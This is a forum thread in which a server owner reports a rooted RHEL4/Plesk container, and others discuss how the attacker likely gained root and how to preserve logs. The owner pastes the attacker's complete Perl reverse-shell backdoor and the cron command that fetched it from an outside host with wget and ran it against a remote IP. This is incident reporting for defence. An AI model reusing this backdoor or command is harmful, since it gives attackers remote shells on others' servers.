Server hacked - unable to log case at Support panel [SOLVED]

General Discussion of atomic repo and development projects.

Ask for help here with anything else not covered by other forums.
biggles
Forum Regular
Forum Regular
Posts: 806
Joined: Tue Jul 15, 2008 2:38 pm
Location: Sweden
Contact:

Server hacked - unable to log case at Support panel [SOLVED]

Unread post by biggles »

Hi,

My server has been hacked. Rootkit Hunter detects rootkits and it seems like they are using my server for sending spams. ASL hasnät prevented the attack and now I am in desperate need of help. But the support panel https://support.prometheus-group.com/ isn't working. I just gives an error message "There was an error processing your request. Please contact the webmaster. Redirected from: portal.php".

What should I do now? The wiki entry isnät very helpful. Just says look for suspicious files.. I could get everything back to the way it was before it got hacked, but they will probably use the same backdoor to hack it again.

The hacking launched a script with the following content:
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Datached\n\n";
Last edited by biggles on Sat Oct 25, 2008 8:18 am, edited 1 time in total.
biggles
Forum Regular
Forum Regular
Posts: 806
Joined: Tue Jul 15, 2008 2:38 pm
Location: Sweden
Contact:

Unread post by biggles »

The script was run from cron:
(root) CMD (cd /tmp ; wget http://flaviu.conf-team.com/d.pl ; perl d.pl 88.191.98.145 23 ; rm -rf d.pl)
biggles
Forum Regular
Forum Regular
Posts: 806
Joined: Tue Jul 15, 2008 2:38 pm
Location: Sweden
Contact:

Unread post by biggles »

They have installed something called verlihub. I read on the website that is is some kind of Direct Connect. Doesn't sound good....
biggles
Forum Regular
Forum Regular
Posts: 806
Joined: Tue Jul 15, 2008 2:38 pm
Location: Sweden
Contact:

Unread post by biggles »

They had changed the login options for the user bin and permitted it to login.
breun
Long Time Forum Regular
Long Time Forum Regular
Posts: 2813
Joined: Sat Aug 20, 2005 9:30 am
Location: The Netherlands

Unread post by breun »

You need root access to change login options and it seems they also had root access to add that cron job. They must have exploited some vulnerability to get root access. What OS are you running? All updates applied? Were you running the ASL kernel?

Do you allow root SSH login using a password? Or they may have cracked your Plesk admin password and added the cron jon that way (if you haven't explicitly disabled being able to change root's crontab from Plesk).
Lemonbit Internet Dedicated Server Management
biggles
Forum Regular
Forum Regular
Posts: 806
Joined: Tue Jul 15, 2008 2:38 pm
Location: Sweden
Contact:

Unread post by biggles »

Yeah, they probably gained root access. The server is RH EL4 running in a hosted VZ-container. So I am not able to run the ASL-kernel.

Everything is updated with yum and ASL.

Root login is not permitted. It is unlikely they have done the change through the Plesk-interface. The password is long and contains special characters.

It is the same thing that happened this summer that made me get ASL. Then I thought they got in by using a security hole in Joomla or ExponentCMS. Not and don't really now. My ASL subscription seems kinda wasted money...
breun
Long Time Forum Regular
Long Time Forum Regular
Posts: 2813
Joined: Sat Aug 20, 2005 9:30 am
Location: The Netherlands

Unread post by breun »

biggles wrote:It is the same thing that happened this summer that made me get ASL. Then I thought they got in by using a security hole in Joomla or ExponentCMS.
Exploiting security holes in a CMS doesn't get you root access. Something more serious happened in this case.
Lemonbit Internet Dedicated Server Management
biggles
Forum Regular
Forum Regular
Posts: 806
Joined: Tue Jul 15, 2008 2:38 pm
Location: Sweden
Contact:

Unread post by biggles »

OK. Good to hear that at least!

I have key-based SSH-login to the server and I cannot imagine how they could hack the Plesk password...
scott
Atomicorp Staff - Site Admin
Atomicorp Staff - Site Admin
Posts: 8355
Joined: Wed Dec 31, 1969 8:00 pm
Location: earth
Contact:

Unread post by scott »

They could have gotten in through another guest host, or by compromising the main server itself. Or even your desktop, best thing to do at this point would be to secure the /var/ossec/logs/ to another box for analysis.
biggles
Forum Regular
Forum Regular
Posts: 806
Joined: Tue Jul 15, 2008 2:38 pm
Location: Sweden
Contact:

Unread post by biggles »

Logs secured!
biggles
Forum Regular
Forum Regular
Posts: 806
Joined: Tue Jul 15, 2008 2:38 pm
Location: Sweden
Contact:

Unread post by biggles »

I am having a very good discussion with support now. The only problem is that my hosting company insists that this is a PHP backdoor that has been used and they are not willing to cooperate at all...
faris
Long Time Forum Regular
Long Time Forum Regular
Posts: 2321
Joined: Thu Dec 09, 2004 11:19 am

Unread post by faris »

Please let us know the outcome. It isn't nice when this happens to anyone.
--------------------------------
<advert>
If you want to rent a UK-based VPS that comes with friendly advice and support from a fellow ART fan, please get in touch.
</advert>
biggles
Forum Regular
Forum Regular
Posts: 806
Joined: Tue Jul 15, 2008 2:38 pm
Location: Sweden
Contact:

Unread post by biggles »

Unfortunately there isn't any nice outcome. I still haven't the faintest idea why this happens and I don't have any idea how to stop it. They gained root access. Here it is suggested that it couldn't happen by just executing some php-scripts from a CMS and my hosting provider says it defiantly could happen with just a faulty script. I don't really know where to look...
breun
Long Time Forum Regular
Long Time Forum Regular
Posts: 2813
Joined: Sat Aug 20, 2005 9:30 am
Location: The Netherlands

Unread post by breun »

biggles wrote:They gained root access. Here it is suggested that it couldn't happen by just executing some php-scripts from a CMS and my hosting provider says it defiantly could happen with just a faulty script.
Your webserver and scripts don't run as root. An exploitable script can let an attacker run code, but it won't give him root access directly. To get to root, the attacker must have exploited something else to escalate privileges. Being able to run code in the first place helps of course, so a vulnerable script may have been the initial attack vector. I remember the vmsplice local root exploit from february this year, but if the server is running a up to date kernel (is it?), the attacker can't have used that one.
Lemonbit Internet Dedicated Server Management
biggles
Forum Regular
Forum Regular
Posts: 806
Joined: Tue Jul 15, 2008 2:38 pm
Location: Sweden
Contact:

Unread post by biggles »

I really don't know. I am just renting a few servers based on RH EL4 with Plesk 8.3 which is running in Virtuozzo containers.
Post Reply